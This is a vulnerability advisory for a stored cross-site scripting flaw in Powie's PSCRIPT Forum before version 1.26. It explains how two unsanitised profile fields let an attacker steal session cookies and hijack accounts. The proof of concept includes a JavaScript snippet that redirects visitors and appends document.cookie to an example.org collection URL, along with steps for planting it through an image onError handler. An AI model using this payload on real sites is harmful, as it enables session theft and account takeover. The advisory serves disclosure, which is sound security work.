Product Powie's PSCRIPT Forum Version All versions before 1.26 OS All with PHP and mySQL. Vendor URL www.pscript.de Vendor Status informed Security Risk Lvl high Remote Exploit yes
Introduction +----------+ pforum is a BBS, similar to phpBB or other. The author provides users possibility to enrich their profiles with personal data. Although the author tries to eliminate malicious code (like unwanted html code) in the inputs, two of the fields are not handled secure. Therefore it's possible to steal cookies or do other nasty things.
More Details +----------+ If you login into your account, pforum saves your user id, your password and the PHP session id. If somebody redirects you, for example using javascript, he can append all this data as a query string to the target URL. Then he can easily using your PHP session id for hijacking your pforum session. If he creates or modifies two cookies with the user id or the crypted password, he can easily hijack your account only by visiting the pforum.
Proof of Concept +--------------+ Create a Javascript file and save it as bad.js (your domain name is in this case example.org). The file contains the following code:
// bad.js function b() { location.href='example.org/compute_stolen_data.ext?'+document.cookie; }
Edit your profile and enter the following line into the the IRC Server or AIM ID Input Box. The string have to be shorter then 100 characters.
Post a lot. Because the picture can't be found and the onError Event Handler catches this, every user with activated javascript will be automagically redirected to http://example.org/compute_stolen_data.ext. All cookie values will be appended to the URL.
Security Risk +-----------+ Critical. You can get administrator or moderator of the forum.
